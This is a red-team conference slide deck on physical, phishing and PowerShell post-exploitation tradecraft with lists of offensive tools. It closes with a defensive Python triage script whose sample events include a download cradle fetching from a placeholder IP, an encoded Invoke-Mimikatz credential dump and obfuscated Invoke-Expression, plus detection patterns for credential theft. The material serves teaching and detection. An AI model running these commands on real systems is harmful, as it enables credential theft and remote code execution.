What is Red Team Service?
~Latest Penetration Test Trends in U.S.~
TOMOHISA ISHIKAWA
scientia.admin@gmail.com
www.scientia-security.org
WHO AM I?
 Tomohisa Ishikawa
• Security Consultant (9 years of experience)
• Specialized Areas
• Penetration Testing, IR, Security Consultation, Vulnerability Management, Awareness, Training, Global Security Management…
• Speaking Experience
• SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017
• Certification Junkie
• CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
Objective
 Sharing one year of experience on the security team of a U.S. insurance company
 Understanding the difference in methodology
• Traditional “Penetration Test” vs. “Red Team”
Does your company (organization) do penetration testing??
What “penetration test” means in Japan…
 Looking at the websites of a certain L company, N company, M company…
• Web security assessment service (Web Application Testing)
• Platform assessment service (Platform Testing)
• Targeted attack assessment service (e-mail drill service, egress-countermeasure verification)
• Wireless LAN assessment service
• DDoS readiness verification service
 Safety first!! The safety of the system is the first priority.
 Note: I use “security assessment” and “penetration test” with almost the same meaning here; if for religious reasons you cannot accept the two being discussed together, please substitute terms as you see fit.
When you go to the U.S.…
Surprisingly, few people call themselves penetration testers?
Only a few people said “I am a penetration tester”.
Is “penetration test” an uncool term???
What is “Red Team”?
 Originally a concept born in the intelligence community
 A team that verifies operations from the adversary's point of view and critically checks the credibility of acquired information
• Devil's Advocate
• CIA Red Cell
What is the difference btw “Red Team” and “Pen Test”?
⇒ Coverage is different!!
(Diagram: three overlapping coverage areas, Digital, Physical and Social, containing the following items)
• Web Application Testing
• Platform Testing
• APT Simulation
• APT Mail Awareness training
• Vishing(Voice Phishing)
• OSINT
• Tail Gating
• Impersonation
• ID Card Cloning
• Physical Access to box
• Elevator Hacking
• Physical Control Bypass
 According to Gartner…
• Long Term Challenge (NOT a point-in-time assessment)
• Testing is carried out over a longer term, and can run at any time, 24 hours a day.
• Defense Coordination
• The Blue Team's capabilities are evaluated as well, and the findings feed into improvement.
• Adversary Simulation
• Conducted from the attacker's own point of view (a fusion of the three perspectives).
• Controlled but Real Intrusion
What is the difference btw “Red Team” and “Pen Test”?
⇒ Different characteristics
Case 1: Physical Penetration Test
 Objective
• How far inside can one get, and what information can be obtained?
Is it possible to bypass physical access control?
 Methodology
• Breaking Locks (Picking, Impressioning, Bypassing)
• Elevator Hacking
• RFID Cloning
• Social Engineering
Physical Penetration Test
Case 2: APT Adversary Simulation Service
 The service levels of the APT Adversary Simulation Service are as follows.
• Awareness Phishing
• Penetration Test Phishing
• Red Team Phishing
Targeted Attack Service
APT Adversary Simulation Service
 Attempting an attack in the same way as the “Japan Pension Service” case
• Following the Cyber Kill Chain
• OSINT & SOCMINT
• Selecting 2 to 3 targets and sending an e-mail with an attachment
• Exploitation
• Using a “fresh” vulnerability & exploit
• Post Exploitation with PowerShell
• Password Cracking with GPU
• Lateral Movement & reaching the “treasures”
Red Team Phishing
OSINT Example
 Check LinkedIn to find the target
 Analyze Twitter with SOCMINT tools
• The target tends to buy shoes at an apparel shop
• Send a coupon while pretending to be the apparel shop
TOOLS
 OSINT
• Maltego https://www.paterva.com/web7/
• FOCA https://www.elevenpaths.com/labstools/foca/index.html
• SpiderFoot http://www.spiderfoot.net/
• Discover Scripts https://github.com/leebaird/discover
• Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng
• Cymon https://cymon.io/
• WeLink https://welink.com/dashboard/
• GEOFEEDIA https://geofeedia.com/
• ECHOSEC https://www.echosec.net/
TOOLS
 OTHER TOOLS (some of them are experimental)
• GoPhish https://getgophish.com/
• Social Engineering Toolkit in Kali Linux
• Cobalt Strike https://www.cobaltstrike.com/
• Mimikatz https://github.com/gentilkiwi/mimikatz
• Responder https://github.com/SpiderLabs/Responder
• IPMI http://fish2.com/ipmi/remote-pw-cracking.html
• MITM Framework https://github.com/byt3bl33d3r/MITMf
• Spray WMI https://github.com/trustedsec/spraywmi
TOOLS
 PowerShell Tools
• PowerShell Empire https://github.com/EmpireProject/Empire
• EmPyre (Python) https://github.com/EmpireProject/EmPyre
• PowerSploit https://github.com/PowerShellMafia/PowerSploit
• Including PowerView, Invoke-Mimikatz, PowerUp
• Veil Framework https://www.veil-framework.com/
• Nishang https://github.com/samratashok/nishang
• Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
• PS Attack https://github.com/jaredhaight/psattack
• NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu
• BloodHound https://github.com/BloodHoundAD/BloodHound
Resource
 Great Presentations
• AD Security https://adsecurity.org/
• All of their presentations are excellent
• Adversarial Post-Exploitation: Lessons From The Pros
• https://www.youtube.com/watch?v=x3crG-hM9sc
• A Year in the Empire
• https://www.youtube.com/watch?v=ngvHshHCt_8
• PowerShell Secrets and Tactics
• https://www.youtube.com/watch?v=EQv4bJnCw8M
• Introducing PowerShell into your Arsenal with PS>Attack
• https://www.youtube.com/watch?v=mPckt6HQPsw
• Invoke-Obfuscation: PowerShell obFUsk8tion Techniques
• https://www.youtube.com/watch?v=P1lkflnWb0I
From Blue Team Side
 The following are what really matters!!
• Full Spectrum Visibility (complete visibility)
• Targeted Containment
 EDR (Endpoint Detection & Response)
• e.g. Tanium, Fidelis, Carbon Black, FireEye, CrowdStrike, Red Cloak, Cybereason…
Wrap-Up
 “Red team” is the trend in the U.S.
 Focus on comprehensive testing
Thank You!!
 If you have any questions, please feel free to contact me
Contact Info
• Email scientia.admin@gmail.com
• JP Blog www.scientia-security.org
Bonus Session
Digital Penetration Test Certification
 Certification for Penetration Tester
• CEH (by EC-Council)
• GIAC (by SANS)
• OSCP (by Offensive Security)

[AVTOKYO 2017] What is red team?

  • 17. What is the difference btw “Red Team” and “Pen Test”? ⇒ Different Feature
    According to Gartner…
    • Long Term Challenge (NOT point-in-time assessment)
      • Testing runs over a longer period, and activity can happen at any hour, 24 hours a day.
    • Defense Coordination
      • The Blue Team's capabilities are evaluated as part of the exercise, and the results are fed back into improvement.
    • Adversary Simulation
      • Conducted from the viewpoint of the attacker itself (fusing the three perspectives: digital, physical and social).
    • Controlled but Real Intrusion
  • 18. Case 1: Physical Penetration Test
  • 19. Physical Penetration Test
    Objective
    • How far inside can we get, and what information can we reach? Is it possible to bypass physical access control?
    Methodology
    • Breaking locks (picking, impressioning, bypassing)
    • Elevator hacking
    • RFID cloning
    • Social engineering
  • 20. Case 2: APT Adversary Simulation Service
  • 21. Targeted Attack Service / APT Adversary Simulation Service
    The APT Adversary Simulation Service is offered at the following service levels (SLA):
    • Awareness Phishing
    • Penetration Test Phishing
    • Red Team Phishing
  • 22. Red Team Phishing
    Attempt attacks the same way as in the Japan Pension Service incident, following the Cyber Kill Chain:
    • OSINT & SOCMINT
    • Select 2 to 3 targets and send them an email with an attachment
    • Exploitation, using a “fresh” vulnerability and exploit
    • Post-exploitation with PowerShell
    • Password cracking with GPUs
    • Lateral movement until the “treasures” are reached
  • 23. OSINT Example
    • Check LinkedIn and find the target
    • Analyze Twitter with SOCMINT tools
      • The target tends to buy shoes at a particular apparel shop
      • Send a coupon while posing as that apparel shop
  • 24. TOOLS: OSINT
    • Maltego https://www.paterva.com/web7/
    • FOCA https://www.elevenpaths.com/labstools/foca/index.html
    • SpiderFoot http://www.spiderfoot.net/
    • Discover Scripts https://github.com/leebaird/discover
    • Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng
    • Cymon https://cymon.io/
    • WeLink https://welink.com/dashboard/
    • GEOFEEDIA https://geofeedia.com/
    • ECHOSEC https://www.echosec.net/
  • 25. TOOLS: OTHER TOOLS (some of these are experimental)
    • GoPhish https://getgophish.com/
    • Social Engineering Toolkit (SET) in Kali Linux
    • Cobalt Strike https://www.cobaltstrike.com/
    • Mimikatz https://github.com/gentilkiwi/mimikatz
    • Responder https://github.com/SpiderLabs/Responder
    • IPMI remote password cracking http://fish2.com/ipmi/remote-pw-cracking.html
    • MITMf (MITM Framework) https://github.com/byt3bl33d3r/MITMf
    • SprayWMI https://github.com/trustedsec/spraywmi
  • 29. TOOLS: PowerShell Tools
    • PowerShell Empire https://github.com/EmpireProject/Empire
    • EmPyre (Python) https://github.com/EmpireProject/EmPyre
    • PowerSploit https://github.com/PowerShellMafia/PowerSploit
      • Includes PowerView, Invoke-Mimikatz and PowerUp
    • Veil Framework https://www.veil-framework.com/
    • Nishang https://github.com/samratashok/nishang
    • Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
    • PS>Attack https://github.com/jaredhaight/psattack
    • NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu
    • BloodHound https://github.com/BloodHoundAD/BloodHound
  • 32. Resources
    Great presentations
    • AD Security https://adsecurity.org/ (every presentation there is awesome)
    • Adversarial Post-Exploitation: Lessons From The Pros https://www.youtube.com/watch?v=x3crG-hM9sc
    • A Year in the Empire https://www.youtube.com/watch?v=ngvHshHCt_8
    • PowerShell Secrets and Tactics https://www.youtube.com/watch?v=EQv4bJnCw8M
    • Introducing PowerShell into your Arsenal with PS>Attack https://www.youtube.com/watch?v=mPckt6HQPsw
    • Invoke-Obfuscation: PowerShell obFUsk8tion Techniques https://www.youtube.com/watch?v=P1lkflnWb0I
  • 33. From Blue Team Side
    What really matters is the following:
    • Full Spectrum Visibility
    • Targeted Containment
    EDR (Endpoint Detection & Response)
    • Ex) Tanium, Fidelis, Carbon Black, FireEye, CrowdStrike, Red Cloak, Cybereason…
  • 34. Wrap-Up
    • “Red team” is the current trend in the U.S.
    • The focus is on comprehensive testing
  • 35. Thank You!!
    If you have any questions, please feel free to contact me.
    Contact Info
    • Email scientia.admin@gmail.com
    • JP Blog www.scientia-security.org
  • 37. Digital Penetration Test Certification
    Certifications for penetration testers
    • CEH (by EC-Council)
    • GIAC (by SANS)
    • OSCP (by Offensive Security)
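The Blue Team slide asks for full-spectrum visibility, and the attack path on the Red Team Phishing slide runs through PowerShell post-exploitation with the tooling listed on the PowerShell Tools slide (Empire, PowerSploit's Invoke-Mimikatz, Invoke-Obfuscation). The Python below is an added example for this page, not code from the talk or from any of the listed tools: it triages constructed PowerShell command-line / script-block text (the shape of the Windows Event 4688 CommandLine or 4104 ScriptBlockText fields) for the tradecraft those slides name, decodes -EncodedCommand payloads (Base64 of UTF-16LE, which is what PowerShell expects), undoes cheap 'a'+'b' concatenation before matching, and scores character-level obfuscation. The hostnames, users, the 192.0.2.10 address (a documentation range) and the indicator list are assumptions for illustration.

```python
"""Triage PowerShell command-line / script-block text for the post-exploitation
tradecraft the talk lists (download cradles, Invoke-Mimikatz, -EncodedCommand
launchers, Invoke-Obfuscation-style string mangling).

Added example for this page; not code from the talk or from any listed tool.
All sample events below are constructed, not captured from a real host.
"""
import base64
import re
from dataclasses import dataclass, field

# Constructed records shaped like the CommandLine (Event 4688) or
# ScriptBlockText (Event 4104) fields. Hosts, users and the IP are fictitious.
SAMPLE_EVENTS = [
    {"host": "WS-1042", "user": "CORP\\alice",
     "text": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object LastWriteTime"},
    {"host": "WS-1042", "user": "CORP\\alice",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"},
    {"host": "WS-2210", "user": "CORP\\bob",
     "text": "Invoke-Mimikatz -DumpCreds"},
    {"host": "WS-2210", "user": "CORP\\bob",
     "text": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'".encode("utf-16-le")
     ).decode("ascii")},
    {"host": "WS-3301", "user": "CORP\\carol",
     "text": "&('I'+'nvo'+'ke-Ex'+'pression') (\"Get-Pro\"+\"cess\")"},
]

# Indicator patterns: an assumed starter set, not an exhaustive ruleset.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "credential_theft": re.compile(r"Invoke-Mimikatz|sekurlsa::|lsadump::|kerberos::", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
}

# -EncodedCommand and the prefixes powershell.exe accepts, then a Base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded payload of every -EncodedCommand argument.
    PowerShell expects Base64 of UTF-16LE; blobs that do not decode cleanly
    are skipped rather than raising, so one bad event cannot stop triage."""
    payloads = []
    for match in ENC_RE.finditer(text):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return payloads


def normalize(text):
    """Undo two cheap Invoke-Obfuscation tricks before pattern matching:
    'a'+'b' string concatenation and backtick escapes inside tokens. Lossy
    (real escapes like `n are flattened too) but fine for indicator matching."""
    joined = re.sub(r"['\"]\s*\+\s*['\"]", "", text)
    return joined.replace("`", "")


def obfuscation_score(text):
    """Fraction of characters that are concatenation/quote/paren noise.
    Plain administrative commands sit near 0; heavily concatenated or
    parenthesised launchers climb well above 0.25."""
    if not text:
        return 0.0
    noise = sum(text.count(ch) for ch in "`+'\"()")
    return noise / len(text)


@dataclass
class Finding:
    host: str
    user: str
    tags: list = field(default_factory=list)
    decoded: list = field(default_factory=list)
    obfuscation: float = 0.0


def triage(event, obfuscation_threshold=0.25):
    """Tag one event. Indicators run against the text with Base64 blobs removed
    (so random Base64 cannot hit a keyword), against its normalized form, and
    against every decoded -EncodedCommand payload."""
    raw = event["text"]
    decoded = decode_encoded_commands(raw)
    stripped = ENC_RE.sub(" ", raw)
    candidates = [stripped, normalize(stripped)] + decoded + [normalize(p) for p in decoded]
    tags = {name for cand in candidates for name, rx in INDICATORS.items() if rx.search(cand)}
    if decoded:
        tags.add("encoded_command")
    score = obfuscation_score(stripped)
    if score >= obfuscation_threshold:
        tags.add("obfuscated")
    return Finding(event["host"], event["user"], sorted(tags), decoded, round(score, 3))


def triage_all(events):
    """Return only the events that produced at least one tag."""
    return [f for f in (triage(e) for e in events) if f.tags]


if __name__ == "__main__":
    for finding in triage_all(SAMPLE_EVENTS):
        print(f"{finding.host} {finding.user} tags={finding.tags} obf={finding.obfuscation}")
        for payload in finding.decoded:
            print("    decoded:", payload)
```

Against the constructed events, the first (an ordinary directory listing) produces no tags, the download cradle and the plain Invoke-Mimikatz call are caught by keyword, the -enc launcher is caught only after the UTF-16LE payload is decoded, and the concatenated Invoke-Expression is caught only after normalization plus the character-frequency score. The threshold and indicator list are starting points to tune against your own baseline, and a real deployment would correlate a hit with process ancestry and network egress rather than alert on a single string. Note that 4104 records only exist if Script Block Logging is enabled, which is itself part of the "full spectrum visibility" the slide calls for.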